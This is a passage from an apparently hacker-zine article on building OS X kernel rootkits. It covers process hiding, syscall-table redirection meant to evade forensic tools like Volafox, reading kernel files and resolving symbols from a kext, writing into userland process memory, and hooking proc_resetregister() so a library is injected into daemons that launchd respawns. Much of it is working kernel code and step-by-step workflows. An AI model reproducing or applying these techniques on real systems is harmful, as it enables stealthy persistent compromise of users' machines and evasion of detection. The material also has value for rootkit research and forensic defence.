last file entry name will be a "ttys" and we need to iterate fd_ofiles
array looking for the previous element to "ttys" - it is not lastfile-1.

It looks complicated but it is not and just a matter of looking up
the necessary information in kernel structures. The proc structure is
extremely rich and a good starting point for many hacks. The biggest
problem is being frequently changed between major OS X versions.

With so many kernel functions available it is almost certain there is
already a function that will avoid us to build the path as described
above. That function is vn_getpath() from bsd/sys/vnode.h.

/*!
 @function vn_getpath
 @abstract Construct the path to a vnode.
 @discussion Paths to vnodes are not always straightforward: a file with
multiple hard-links will have multiple pathnames, and it is sometimes
impossible to determine a vnode's full path. vn_getpath() will not enter
the filesystem.
 @param vp The vnode whose path to obtain.
 @param pathbuf Destination for pathname; should be of size MAXPATHLEN
 @param len Destination for length of resulting path string. Result will
include NULL-terminator in count--that is, "len"
 will be strlen(pathbuf) + 1.
 @return 0 for success or an error code.
 */
int vn_getpath(struct vnode *vp, char *pathbuf, int *len);

We still need to retrieve a vnode from the proc structure to use this
function. To find the vnode we can use the lastfile trick to find the
target path, retrieve its vnode and then use this function to get the
full path.

A better solution is to hide your data inside other data files that
can't be easily checksum'ed. Sqlite3 databases come to my mind [35].


----[ 2.5 - Hiding processes

The traditional way to hide processes is to remove them from the process
list maintained by the kernel. When an application requests the process
list, the rootkit intercepts and modifies the request. In this case,
only the results are modified and the underlying structures are still
intact. A rootkit detection tool can access those structures and compare
with the results.

Another possibility is to remove the processes from the process list. This
time a tool that is based on those structures information will not be
able to detect the inconsistency because there is none (regarding only
the proc list, because there is data in other structures that can be
used to signal inconsistencies).

Due to OS X design, things are a bit more fun (or complicated) because
the BSD layer runs on top of XNU layer. The basic process units are Mach
tasks and threads and there's a one-on-one mapping between BSD processes
and Mach tasks. The task is just a container and Mach threads are the
units that execute code. What matters for this case is that there is
an additional list where inconsistencies can be detected - the Mach
tasks list. Using an ascii version of nofate's diagram found at [3]:

 proc <-> proc  <-> proc  <-> ...
  ^         ^         ^              BSD
--|---------|---------|------------------
  v         v         v              Mach
tasks <-> tasks <-> tasks <-> ...

The version with a hidden process at the BSD layer:

 proc <------------> proc <-> ...
  ^         ^         ^              BSD
--|---------|---------|------------------
  v         v         v              Mach
tasks <-> tasks <-> tasks <-> ...

Each BSD process has reference to the Mach tasks list via a void pointer
and vice-versa. Transversing both lists can detect the inconsistency
described above and most certainly flag an installed rootkit (it is
possible to have a Mach task without a corresponding BSD process).

struct proc {
(...)
    void *task;     /* corresponding task (static) */
(...)
}

struct task {
(...)
    void *bsd_info; /* the corresponding proc_t */
(...)
}

The (not so new) lesson to extract from this is that there many points to
be used for detecting inconsistencies in the system. These are hard to
hide if the goal is to hide one or more rogue processes. A much better
solution is to piggyback into normal processes, where detection is a
bit harder - it can be a normal process with an extra thread running
for example. The piggyback solution will be used later to run userland
commands from the kernel.


----[ 2.6 - Modifying the syscall handler

A common technique to hide modifications to syscall table is to make a
copy and modify the syscall handler to point to this new one. Rootkit
detection utils that just verify the *legit* table are unable to detect
it. There's nothing new about this technique although I have never seen it
in use in OS X. It is a good opportunity to describe how to implement it.

The interrupt 0x80 is handled by the assembly function
idt64_unix_scall [osfmk/x86_64/idt64.s]. The IDT table definition
[osfmk/x86_64/idt_table.h] confirms this and can be runtime verified by
querying the IDT and extracting the address of int80 handler.

USER_TRAP_SPC(0x80,idt64_unix_scall)

Follow the idt64_unix_scall assembler code. The switch to C happens
when unix_syscall[64] function is called, both for interrupt 0x80 and
sysenter/systrap system calls. This code path opens many opportunities
to change pointers, or install trampolines and redirect code to rootkit's
implementation.

One such possibility is to change the table pointer inside
unix_syscall[64]. This is sample code from the 64 bits version:

(...)
    code = regs->rax & SYSCALL_NUMBER_MASK;
    DEBUG_KPRINT_SYSCALL_UNIX(
        "unix_syscall64: code=%d(%s) rip=%llx\n",
        code, syscallnames[code >= NUM_SYSENT ? 63 : code], regs->isf.rip);
    callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
    uargp = (void *)(&regs->rdi);
(...)
    AUDIT_SYSCALL_ENTER(code, p, uthread);
    error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
    AUDIT_SYSCALL_EXIT(code, p, uthread, error);
(...)

Disassembly output (here I renamed memory references in IDA since they
have no symbols associated):

loc_FFFFFF80005E169C:
4C 03 2D 2D EA 21 00            add     r13, cs:sysent
4C 3B 2D 26 EA 21 00            cmp     r13, cs:sysent
74 0B                           jz      short loc_FFFFFF80005E16B7

The sysent reference is to:

__DATA:__got:FFFFFF80008000D0 40 58 85 00 80 FF FF FF sysent   dq offset
sysent_table

To directly find the location of sysent in the __got section is very
easy. Find out the location of sysent table using one of the section 2
techniques (or some other) and then search the __got section for that
address (to find the location and boundaries of __got section we just
need to read kernel's Mach-O header).

The easiest way to redirect sysent is to modify that pointer to our
modified copy. A (memory) forensic tool that (only) searches for and
lookups the original sysent table will fail to detect this and the next
trick. For example, Volafox v0.8 is vulnerable. Volatility's Mac version
at the time of writing has yet no sysent plugin available.

Another way is to modify the code reference to __got section and instead
point it to somewhere else. This is very easy to implement with diStorm's
assistance.

Disassemble the unix_syscall[64] functions and lookup for references to
__got address. The instructions that need to be matched are ADD and CMP
(this assumption appears to hold always true). To calculate the RIP target
address, diStorm has a helper macro called INSTRUCTION_GET_RIP_TARGET().
If the RIP address matches the __got address the offset can be updated.
Calculate the offset to the address that contains the pointer to the
new table and update it at the instruction that referenced the old
__got pointer.

One last (important!) detail. RIP addressing uses a 32 bits offset,
which appears to be enough to reference the new sysent (dynamically or
statically allocated) in most cases. This might not always be true -
from my experience the distance is very near the signed int limit.

One way to make this safer is to put the pointer in kernel's memory
space. This can be alignment space, Mach-O header (for the lulz!), or
somewhere else (it is just a data pointer so no need for exec permission).


--[ 3 - Reading the filesystem from kernel land

Now let's get going with the fun stuff that opens the door to even
funnier stuff!

One of the annoying obstacles that Apple introduced against development
of rootkits is the lack of kernel's full __LINKEDIT segment up to Snow
Leopard. Useful symbols for rootkit development are also not exported. No
one said rootkit development was easy - fun but not always easy.

Possible solutions are to solve the symbols from userland, and pattern
search from the kext - this one easily susceptible to failure due to
changing patterns in kernel versions and compilers.

For example, OS.X/Crisis spyware adopts a mixed approach. Most symbols
are solved from the userland agent and communicated thru a character
device to the rootkit, but sLoadedKexts is solved with byte search -
starting point is still a symbol solved from userland.

The easiest solution to this problem is to read the kernel file
(/mach_kernel) from the rootkit and process the symbol table, as it is
done from userland. The extracted addresses need to be fixed with the
kernel ASLR slide but that is easily bypassed as described in section 2.2.

As far as I know no publicly known OS X rootkit ever implemented arbitrary
filesystem read, and probably very few to none in other platforms (TDSS
being the most famous in Windows). There is some kind of myth about the
difficulty of implementing this or something else that made rootkits
developers avoid it. I must confess I was influenced by that "myth"
and never bothered to give it a try before this article.

In practice the implementation is extremely easy! Sometimes you just
need to be in the right mood and give it a try.

Two methods will be shown, one very easy based on exported symbols (and
a copy of a very stable private extern kernel function), and another a
bit more complex that requires some unexported symbols. Both are based in
VFS - the obvious and easiest way to achieve our goal. Other functions
can be used so many variations are possible. That is left open for you
to explore, I still have a lot to write about in this paper :-)


----[ 3.1 - Real short overview of VFS

The Virtual-Filesystem Interface was introduced in 4.4BSD and first
implemented by Sun Microsystems. Before this innovation file entries
directly referenced filesystem inodes. This method does not scale well
if there's more than a filesystem type.

VFS is an additional extensible object-oriented layer that introduces
an abstraction of the underlying filesystem, making it easy to support
multiple filesystems. Instead of inodes there are vnodes. There is no
need to deal with the intricacies of multiple filesystems - we can use
the VFS related functions and let the kernel do the filesystem operations
"dirtywork".

The most interesting VFS related structures to our purposes are:
- struct filedesc: defined at bsd/sys/filedesc.h, represents the open files
in a process.
- struct fileproc: defined at bsd/sys/file_internal.h, represents each open
file.
- struct fileglob: defined at bsd/sys/file_internal.h, contains all the
information associated to a file, including vnode and supported filesystem
operations.
- struct vnode: defined at bsd/sys/vnode_internal.h.

Detailed references about the design and implementation can be found at
[20], [14] and [13].


----[ 3.2 - The easy way - Apple loves rootkit authors!

The first piece of information that we need is the vnode of the target
file we want to read. We already seen in section 2.4 that this information
is available in proc_t structure but we can follow an easier path!

One suitable function is vnode_lookup() (available in BSD KPI). It is
defined at bsd/vfs/vfs_subr.c in XNU source code, and well documented
at bsd/sys/vnode.h include:

/*!
 @function vnode_lookup
 @abstract Convert a path into a vnode.
 @discussion This routine is a thin wrapper around xnu-internal lookup
routines; if successful, it returns with an iocount held on the resulting
vnode which must be dropped with vnode_put().
 @param path Path to look up.
 @param flags VNODE_LOOKUP_NOFOLLOW: do not follow symbolic links.
              VNODE_LOOKUP_NOCROSSMOUNT: do not cross mount points.
 @return Results 0 for success or an error code.
 */
errno_t vnode_lookup(const char *, int, vnode_t *, vfs_context_t);

The arguments are the path for the target file, search flags, a vnode_t
pointer for output and the vfs context for the current thread (or kernel
context).

The vfs context can be obtained using the function vfs_context_current()
but it is only available in the Unsupported KPI - subject to whatever
Apple wants to do with it so not stable enough for our purposes. In
practice the vfs context is not a problem because Apple (or BSD's
original code) took good care of us. Let me show you why with kernel's
implementation of vnode_lookup():

errno_t
vnode_lookup(const char *path, int flags, vnode_t *vpp, vfs_context_t ctx)
{
    struct nameidata nd;
    int error;
    u_int32_t ndflags = 0;

    if (ctx == NULL) {      /* XXX technically an error */
        ctx = vfs_context_current(); // <- thank you! :-)
    }
(...)
}

Apple's love means that we just need a simple operation to retrieve
kernel's vnode:

#include <sys/vnode.h>
int error = 0;
vnode_t kernel_vnode = NULLVP;
error = vnode_lookup("/mach_kernel", 0, &kernel_vnode, NULL);

One important detail is that vnode_lookup() will increase the iocount on
the target vnode (in case you missed above note from vnode_lookup). We
must release it using vnode_put() when we do not need it anymore (after
reading or writing what we want). This function is also available in
the BSD KPI.

Having kernel's vnode information we can finally read its contents from
the rootkit. To do that we can use the VNOP_READ() function - documented
and declared at bsd/sys/vnode_if.h.

/*!
 @function VNOP_READ
 @abstract Call down to a filesystem to read file data.
 @discussion VNOP_READ() is where the hard work of of the read() system
call happens. The filesystem may use  the buffer cache, the cluster layer,
or an alternative method to get its data; uio routines will be used to see
that data is copied to the correct virtual address in the correct address
space and will update its uio argument to indicate how much data has been
moved.
 @param vp The vnode to read from.
 @param uio Description of request, including file offset, amount of data
requested, destination address for data, and whether that destination is in
kernel or user space.
 @param ctx Context against which to authenticate read request.
 @return 0 for success or a filesystem-specific error. VNOP_READ() can
return success even if less data was read than originally requested;
returning an error value should indicate that something actually went
wrong.
 */
extern errno_t VNOP_READ(vnode_t, struct uio *, int, vfs_context_t);

The last missing piece is an uio structure. To create that buffer we
can use three other functions: uio_create(), uio_createwithbuffer()
and uio_addiov().

Two are available in BSD KPIs - uio_create and uio_addiov. The other
one, uio_createwithbuffer is private extern and used by uio_create. We
can rip its implementation into our rootkit code from XNU source file
bsd/kern/kern_subr.c. It's simple and stable enough to make this possible
(never modified in all latest OS X versions).

Once again we can pass NULL to the ctx argument - the implementation takes
care of it for us as in vnode_lookup().

An example how to create the required structure to hold a 4kbytes page:

char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
uio = uio_create(1, 0, UIO_SYSSPACE, UIO_READ);
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);

The same example using uio_createwithbuffer:

char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
char uio_buf[UIO_SIZEOF(1)];
uio = uio_createwithbuffer(1, 0, UIO_SYSSPACE, UIO_READ, &uio_buf[0],
 sizeof(uio_buf));
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);

First create the uio buffer, and then add it else it can't be used.
The data buffer can be a statically allocated buffer (as above) or
dynamically allocated using _MALLOC() or other available kernel variant.

Having the uio buffer created the last step is to execute the read:

error = VNOP_READ(kernel_vode, uio, 0, NULL);

If successful, the buffer will contain the first page (4096 bytes) of
/mach_kernel OS X kernel read into data_buffer.

A good implementation reference of this process is the kernel function
dqfileopen() [bsd/vfs/vfs_quota.c].


----[ 3.3 - The more complex way

This second approach was in fact how I started to explore this problem
and before I learnt about vnode_lookup(). It is a good backup method
but the learning experience and some techniques used to obtain some
information are the interesting bits here.

Its biggest inconvenience is that it requires the unexported symbol
VNOP_LOOKUP(). This function requires diferent arguments but has the
same functionality as vnode_lookup() - to lookup the vnode of a file
or directory. Documentation can be found at bsd/sys/vnode_if.h.

/*!
 @function VNOP_LOOKUP
 @abstract Call down to a filesystem to look for a directory entry by name.
 @discussion VNOP_LOOKUP is the key pathway through which VFS asks a
filesystem to find a file. The vnode should be returned with an iocount to
be dropped by the caller. A VNOP_LOOKUP() calldown can come without a
preceding VNOP_OPEN().
 @param dvp Directory in which to look up file.
 @param vpp Destination for found vnode.
 @param cnp Structure describing filename to find, reason for lookup, and
various other data.
 @param ctx Context against which to authenticate lookup request.
 @return 0 for success or a filesystem-specific error.
 */
#ifdef XNU_KERNEL_PRIVATE
extern errno_t VNOP_LOOKUP(vnode_t, vnode_t *, struct componentname *,
vfs_context_t);
#endif /* XNU_KERNEL_PRIVATE */

The first argument is the vnode of the directory where the target file
is located. It is a kind of a chicken and egg problem because we do not
have that information - we want it! Do not fear, this information can
be extracted from somewhere else. As previously described, the proc
structure contains the field p_fd - pointer to open files structure
(struct filedesc).

The filedesc structure has two interesting fields for our purposes:

1) fd_ofiles - an array of file structures for open files.
2) fd_cdir   - vnode structure of current directory.

There is also fd_rdir, which is the vnode of root directory but from my
tests it is usually NULL.

The proc structure is a doubly-linked list - we can "walk" around it and
retrieve information of any process. In OS X, the kernel is just another
Mach task with PID 0 and a corresponding proc entry - before Leopard
we could access kernel task via task_for_pid(0), which allowed DKOM
(direct kernel object manipulation). The mach_kernel file is located at
the root directory /.

The proposed procedure is to traverse the proc structure and find pid 0
(field p_pid). When found, the field fd_cdir will contain what we need -
the vnode for the root directory.

Next problem: how to access the proc structure. There is a symbol called
allproc that contains a pointer to it but it is not exported anymore. We
need an alternative way! Two solutions: complicated and straightforward.

Recalling what was already described in section 2.4. Kernel's
implementation of syscall functions has a struct proc * as first
parameter. Using open() as example:

open(struct proc *p, struct open_args *uap, int *retval)

What we can do is to temporarily (or not) hijack a syscall via sysent
table and get a reference to any proc_t. Since it is a doubly-linked
list we can traverse it and find PID 0. When found we can extract the
vnode pointer for current directory and that is it.

The kernel does not keep /mach_kernel open so the field fd_ofiles is
not useful. Luckly for us the fd_cdir is populated with the information
we need - vnode of root directory /.

The kernel knowledgeable reader knows there is no need for all this
mess to retrieve a proc_t structure. There is a BSD KPI function that
solves the problem with a single call, proc_find(). Its prototype is:
proc_t proc_find(int pid)

Kernel is just another task with PID 0, so just execute proc_find(0)
and get the required structure pointer. This will increase the reference
count and must be released using proc_rele(). Very easy, right? :-)

Once again we need a vfs context and this time we need to supply it. While
researching I used a hardcoded function pointer to vfs_context_current()
but there is a better function that I found out while writing this
section. It is vfs_context_create(), available in BSD KPI.

/*!
 @function vfs_context_create
 @abstract Create a new vfs_context_t with appropriate references held.
 @discussion The context must be released with vfs_context_rele() when no
longer in use.
 @param ctx Context to copy, or NULL to use information from running
thread.
 @return The new context, or NULL in the event of failure.
 */
vfs_context_t vfs_context_create(vfs_context_t);

We can use this function to create a new context and pass it to
VNOP_LOOKUP(). The next step is to create a struct componentname
[bsd/sys/vnode.h].

struct componentname {
     // Arguments to lookup.
    uint32_t    cn_nameiop;     /* lookup operation */
    uint32_t    cn_flags;       /* flags (see below) */
    void        *cn_reserved1;  /* use vfs_context_t */
    void        *cn_reserved2;  /* use vfs_context_t */
    // Shared between lookup and commit routines.
    char        *cn_pnbuf;      /* pathname buffer */
    int         cn_pnlen;       /* length of allocated buffer */
    char        *cn_nameptr;    /* pointer to looked up name */
    int         cn_namelen;     /* length of looked up component */
    uint32_t    cn_hash;        /* hash value of looked up name */
    uint32_t    cn_consume;     /* chars to consume in lookup() */
};

A small example to lookup /mach_kernel:

 struct componentname cnp;
 char tmpname[] = "mach_kernel";
 bzero(&cnp, sizeof(cnp));

 cnp.cn_nameiop = LOOKUP;
 cnp.cn_flags = ISLASTCN;
 cnp.cn_reserved1 = vfs_context_create(NULL);
 cnp.cn_pnbuf = tmpname;
 cnp.cn_pnlen = sizeof(tmpname);
 cnp.cn_nameptr = cnp.cn_pnbuf;
 cnp.cn_namelen = (int)strlen(tmpname); // <- add NULL ?

Now we are ready to call VNOP_LOOKUP() and use the returned vnode
information to execute VNOP_READ() as in section 3.1 (do not forget to
create first the UIO buffer).

Last but not least, there is another function we can (ab)use to read files
- vn_rdwr(). It was this function that triggered my curiosity about this
process while reading about the execution flow of a Mach-O binary. The
parameters it requires can be retrieved or created with the techniques
above described or others you might come up with. Feel free to implement
it and discover alternative ways to read the files (there are more!).

Writing is not harder than reading. Just browse the source files mentioned
in this section and the functions you need will be obvious. You can
apply the techniques here described to fill the required parameters.


----[ 3.4 - Solving kernel symbols

Snare on his blog post [5] explains in detail how to solve the kernel
symbols. The only difference is that instead of reading directly from
kernel memory we have the information in temporary buffers with data
read from the filesystem.

The proposed workflow is:

1) Read the first page of /mach_kernel, which contains the Mach-O header.
2) Process the Mach-O header and retrieve the following information:
   - From __TEXT segment: vmaddr field (for ASLR slide computation).
   - From __LINKEDIT segment: fileoff and filesize (so we can read the
   segment).
   - From LC_SYMTAB command: symoff, nsyms, stroff, strsize.
   Refer to [10] for more information about Mach-O file format.
3) Allocate buffer and read the whole __LINKEDIT segment.
4) Solve any required symbol by processing the __LINKEDIT buffer using the
LC_SYMTAB collected information (offsets to symbol and string tables).
5) Do not forget to add the kernel ASLR slide to the addresses. Slide can
be computed by the difference between running __TEXT vmaddr and the one
read from disk.

There is no need to read the whole mach_kernel file into kernel space,
we just need the headers and __LINKEDIT segment, around 1MB, smaller
than the 7.8MB of Mountain Lion 10.8.2 full kernel. Kernel memory is at
a premium :-)


--[ 4 - Executing userland binaries from the kernel

This section describes a technique to execute userland processes
from a kernel extension (not tested but should also be valid from
IOKit drivers). For this purpose wowie and ghalen used the KUNC API
(Kernel-User Notification Center), a straightforward interface to execute
userland executables. One problem with KUNC is that the required symbols
are provided by the Unsupported KPI and Apple has the following note:
The Kernel-User Notification Center APIs are not available to KEXTs that
declare dependencies on the sustainable kernel programming interfaces
(KPIs) introduced in OS X v10.4.

Having different ways to accomplish a given goal is more fun and
improves knowledge, which is this paper's main goal. The technique to be
presented is probably not the most efficient one but it is a good learning
experience about playing with kernel and how everything is implemented.


----[ 4.1 - Writing from kernel memory into userland processes

The first step is to find a way to write to userland process addresses
from a kernel extension. In userland there is the mach_vm_write() function
(or older vm_write()) to write to any arbitrary process, assuming we
have the right permissions to do so (task_for_pid() is our friend).

Its prototype is:

kern_return_t mach_vm_write(vm_map_t target_task,
mach_vm_address_t address, vm_offset_t data,
mach_msg_type_number_t dataCnt);

If you look at the definition of the task structure (a void* at proc
structure but defined at osfmk/kern/task.h) you can find the first
parameter to mach_vm_write in the "map" field. The remaining parameters
are the target address, the data buffer to write and its size.

Do not forget that we need first to use mach_vm_protect (or vm_protect)
to change memory protections if trying to write to the read-only
segments/sections.

The problem with this approach is that it does not work!
The memory protection is changed but mach_vm_write() does not modify the
target address. The answer is that if called like this we are trying
to write data from kernel space directly to the userland space, which
should (obviously!) fail. Remember we need to use copyin/copyout to
copy between the two spaces.

We need another solution and I will present not one but two, both easy
to use. Thanks go to snare for giving me some initial sample code from
his own research.

The first solution uses three functions, vm_map_copyin(),
vm_map_copyout(), and mach_vm_copy(). You can read their description at
osfmk/vm/vm_map.c and vm_user.c in XNU sources.

vm_map_copyin creates an object from a given address located in a given
map that we can insert into another address space. This assures the
correct transition between kernel and user virtual memory spaces.

The vm_map_copyout() function copies the object into the target map,
aka, our target process. We need the vm_map_t info for kernel and target
process - both can be found by iterating proc list or proc_find(),
as previously described.

There is one important detail about vm_map_copyout! It injects the object
"into newly-allocated space in the destination map". What this means is
that we are just copying the data into a new memory address at the user
process and not at the target address we want. Let me show you with an
example of what happens using that command:

char *fname = "nemo_and_snare_rule!";
kern_return_t kr = 0;
vm_map_address_t dst_addr;

kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname,
strlen(fname)+1, FALSE, &copy);
kr = vm_map_copyout(task->map, &dst_addr, copy);

dst_addr will contain the value 0x11fa000 (target was a 32 bits process).
Dumping the process memory:

sh-3.2# ./readmem -p 121 -a 0x11fa000 -s 32
[ Readmem v0.4 - (c) fG! ]
--------------------------
Memory protection: rw-/rwx

0x11fa000 6e 65 6d 6f 5f 61 6e 64 5f 73 6e 61 72 65 5f 72 nemo_and_snare_r
0x11fa010 75 6c 65 21 00 00 00 00 00 00 00 00 00 00 00 00 ule!............

At this point we need to copy the contents to the target address we
want to. This can be achieved using mach_vm_copy() - a function that
copies one memory region to another within the same task. The address
where the data was copied to can be found at the second parameter of
vm_map_copyout().

It must be noticed that the first two functions are available as
Private KPIs and mach_vm_copy() is not exported (I cheated in above's
example). Not a big problem since we can easily solve the symbols.

The sample code to write to the Mach-O header of a 32 bits, no ASLR
binary could be something like this:

// get proc_t structure and task pointers
struct proc *p = proc_find(PID);
struct proc *p_kernel = proc_find(0);
struct task *task = (struct task*)(p->task);
struct task *kernel_task = (struct task*)(p_kernel->task);
kern_return_t kr = 0;
vm_prot_t new_prot = VM_PROT_WRITE | VM_PROT_READ;
kr = mach_vm_protect((vm_map_t)task->map, 0x1000, len, FALSE, new_prot);

vm_map_copy_t copy;
char *fname = "nemo_and_snare_rule!";
vm_map_address_t dst_addr;

// create a vm_map_copy_t object so we can insert it at userland process
kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname,
strlen(fname)+1, FALSE, &copy);

// copy the object to userland, this will allocate a new space into target
// map
kr = vm_map_copyout((vm_map_t)task->map, &dst_addr, copy);
printf("wrote to userland address 0x%llx\n", CAST_USER_ADDR_T(dst_addr));

// and now we can use mach_vm_copy() because it copies data within the same
// task
kr = mach_vm_copy((vm_map_t)task->map, CAST_USER_ADDR_T(dst_addr),
strlen(fname)+1, 0x1000);
// release references created with proc_find() - must be always done!
proc_rele(p);
proc_rele(p_kernel);

To deallocate that new allocated space in userland vm_map_remove()
is a good candidate:

/*
 * vm_map_remove:
 * Remove the given address range from the target map.
 * This is the exported form of vm_map_delete.
 */
extern kern_return_t
vm_map_remove(vm_map_t         map,
              vm_map_offset_t  start,
              vm_map_offset_t  end,
              boolean_t        flags);

An easy alternative is to just zero those bytes and assume that space
as a small memory leak. It works and it is not a big deal.

The second solution requires a single function and has no
memory allocation at the target process. We are talking about
vm_map_write_user(): "Copy out data from a kernel space into space in
the destination map. The space must already exist in the destination map."

The prototype:
kern_return_t
vm_map_write_user(vm_map_t map, void *src_p, vm_map_address_t dst_addr,
vm_size_t size);

Where map is the vm_map_t of the target process, and src_p the kernel data
buffer we want to write to the process. The previous example using this
function:
struct proc *p = proc_find(PID);
struct task *task = (struct task*)(p->task);
kern_return_t kr = 0;
vm_prot_t new_protection = VM_PROT_WRITE | VM_PROT_READ;
char *fname = "nemo_and_snare_rule!";
// modify memory permissions
kr = mach_vm_protect(task->map, 0x1000, len, FALSE, new_protection);
kr = vm_map_write_user(task->map, fname, 0x1000, strlen(fname)+1);
proc_rele(p);

This alternative is easier and does not allocate new memory at the target.
Do not forget to restore the original memory permissions.

After so many words you are probably asking why not use copyout to copy
from kernel to userland? Well, of course it is possible but there is
a problem. It can't be used to overwrite to arbitrary processes - only
against the current process. Even if we try to change the current map to
another process using vm_map_switch(), copyout will always retrieve the
current process so copyout will fail with EFAULT if we try an address
of another process that does not exists in current. This means that it
can be used, for example, inside a hooked syscall but not to write to
arbitrary processes.


----[ 4.2 - Abusing (again!) dyld to inject and run code

Most of the time hacking is about abusing features or lack-of. This
time we are going to piggyback on dyld and launchd. Poor bastards!
The idea is that launchd will restart our target process and dyld will
be responsible for executing our code. I used the dyld approach in
OS.X/Boubou PoC described at [12] and [34], so why not again? It is easy
to implement and works very well.

The core of this idea is to emulate the DYLD_INSERT_LIBRARIES (equivalent
to LD_PRELOAD for those coming from ELF Unix world) when a new process
is created. The library will be responsible for executing whatever
we want to. In this case we want to modify the Mach-O header before
passing control to dyld. When dyld gains control (it is dyld who passes
control to target's entrypoint not the kernel) it will read the header
from target's memory and process it. This presents an opportunity to
successfully modify and inject the Mach-O header.

The presentations at Secuinside [11] and HitCon [12] discuss the Mach-O
header details and injection process. This is valid for dynamically
linked executables, where execution will start at the dynamic linker
(/usr/lib/dyld) and then continue at the executable entry point.

Launchd is the perfect target because it can automatically respawn daemons
and agents, at root or user privilege level. The idea is to kill a daemon,
intercept the respawn and inject the library we want to be executed. The
privilege level we want to execute at depends on the target daemon.

What we need is to find a good place to intercept the respawn of the
target process and modify its memory before control is passed to dyld.

A simplified version of the binary execution process, adapted from [13] is:

     execve() -> __mac_execve()
                        |
                        v
               exec_activate_image()
                        |
                        v
                    Read file
                        |
                        v
           .----> exec_mach_imgact() -> run dyld -> target entry point
           |            |
           |            v
           |       load_machfile()
           |            |
           |            v
           |      parse_machfile()   [maps the load commands into memory]
           |            |
           |            v
           |       load_dylinker()   [sets image entrypoint to dyld]
           |            |
           |            v
           `--------- (...)

Chapter 7 of [14] and Chapter 13 of [13] thoroughly describe the execution
process in case you are interested in every detail.

The above diagram presents many places where we can modify the new process
memory and its Mach-O header. As previously mentioned, when dyld gains
control it will parse again the Mach-O header so our modification is
guaranteed to be used if made before dyld's control.

We can confirm this by looking at dyld source code [15]:

//
// Entry point for dyld. The kernel loads dyld and jumps to __dyld_start
// which sets up some registers and call this function.
//
// Returns address of main() in target program which __dyld_start jumps to
//
uintptr_t
_main(const macho_header* mainExecutableMH, uintptr_t mainExecutableSlide,
        int argc, const char* argv[], const char* envp[],
        const char* apple[], uintptr_t* startGlue)

One curious detail (without any practical application I can foresee
now) is that dyld does not validate the header - the magic value can
be modified to anything and dyld will happily continue its work. Kernel
data can be trusted, right?


----[ 4.3 - Finding the place to execute the injection

With theory in place it is finally time to move to practice! We need
to find one or more places where we can modify the target process memory
and inject our dynamic library.

The kernel has no symbol stubs so we can't just modify a pointer and
hijack a useful function. One solution is to inline hook the function
prologue and make it jump to our function. We can simplify this by
implementing the whole original function (copy from XNU source into our
rootkit); this way we do not need to return back to the original one,
just restore the original bytes when we finish our evil work.

A good starting point to look for candidate functions is
exec_mach_imgact(). The reason why is that when it returns control
to dyld everything required to execute the new process is set (kernel
side). As much as possible near its end is best.

After exploring exec_mach_imgact, I found a good candidate at
task_set_dyld_info(). It is called twice, one before the image is loaded
into memory, and another after the image is loaded. Clearly, the former
does not interest us so we need to distinguish between each case. This
function is only used at exec_mach_imgact().

Looking at its code in osfmk/kern/task.c:

void
task_set_dyld_info(task_t task, mach_vm_address_t addr,
mach_vm_size_t size)
{
    task_lock(task);
    task->all_image_info_addr = addr;
    task->all_image_info_size = size;
    task_unlock(task);
}

The locks calls are nothing else than macros using a symbol available in
KPIs:

#define task_lock(task)     lck_mtx_lock(&(task)->lock)
#define task_unlock(task)   lck_mtx_unlock(&(task)->lock)

It is a great candidate - we can copy & paste its code into our
rootkit source, add our code to inject the library and then execute
the original function code. Because it is not a static function we can
find its symbol. The first parameter is a task_t structure, which has
a pointer to the correspondent proc_t structure (remember that proc and
task structures are connected to each other via void pointers).

The proposed workflow could be:

1) Find task_set_dyld_info() address.
2) Patch prologue to jump to our function.
3) Execute our function to inject library.
4) Restore original bytes from 2).
5) Execution continues, our library is executed by dyld.

The only problem with this function is here at exec_mach_imgact():

    /*
     * Remember file name for accounting.
     */
    p->p_acflag &= ~AFORK;
    /* If the translated name isn't NULL, then we want to use
     * that translated name as the name we show as the "real" name.
     * Otherwise, use the name passed into exec.
     */
    if (0 != imgp->ip_p_comm[0]) {
        bcopy((caddr_t)imgp->ip_p_comm, (caddr_t)p->p_comm,
            sizeof(p->p_comm));
    } else {
        if (imgp->ip_ndp->ni_cnd.cn_namelen > MAXCOMLEN)
            imgp->ip_ndp->ni_cnd.cn_namelen = MAXCOMLEN;
        bcopy((caddr_t)imgp->ip_ndp->ni_cnd.cn_nameptr, (caddr_t)p->p_comm,
            (unsigned)imgp->ip_ndp->ni_cnd.cn_namelen);
        p->p_comm[imgp->ip_ndp->ni_cnd.cn_namelen] = '\0';
    }

The process name in proc_t structure is only set after the second call
to task_set_dyld_info(), so we can't use it to detect which process
is going to be executed and trigger or not our injection (remember we
are only interested in a specific process to be executed by launchd). A
workaround to this problem is to lookup the open files structure in proc_t
(p_fd field).

An alternative solution is to use another function! There is
an even better one near the end of exec_mach_imgact() called
proc_resetregister(). The advantage of being near the end is that we can
change a lot more things (kernel completed most of its tasks related to
new process execution), opening way for some cute tricks.

Its implementation is also very simple [bsd/kern/kern_proc.c]:

void proc_resetregister(proc_t p)
{
    proc_lock(p);
    p->p_lflag &= ~P_LREGISTER;
    proc_unlock(p);
}

The lock/unlock here are implemented as functions instead of macros and
not exported. We can simply define the macros or change our code to
use lck_mtx_*. This time we have a proc_t structure and can use the
p_comm field to find our target(s) (or proc_name() to get the name of
a given pid). Perfect spot!

With a location where to execute our modifications we can proceed to
the last step, modify the target Mach-O header.


----[ 4.4 - Ideas are great, execution is everything

Assuming that our hijacked function is proc_resetregister(), we can
extract all the information we will need from the proc_t parameter. Let's
proceed with this.

The number of binaries that use ASLR is increasing so the first step is to
find at which memory address is the binary loaded (the Mach-O header to be
more specific). The ASLR slide is generated inside load_machfile() and not
set in a struct/var or returned. One way to solve the problem is to take a
peak at the virtual memory map (vmap) of the target process. The following
does the job (assuming we are inside our own proc_resetregister()):

struct task *task = (struct task*)p->task;
mach_vm_address_t start_address = task->map->hdr.links.start;

Start contains the lower address of the process, which is where the
Mach-O header is located at. This *appears* to hold always true (there
are good reasons to believe it!).

To modify the Mach-O header of the target process we need to parse
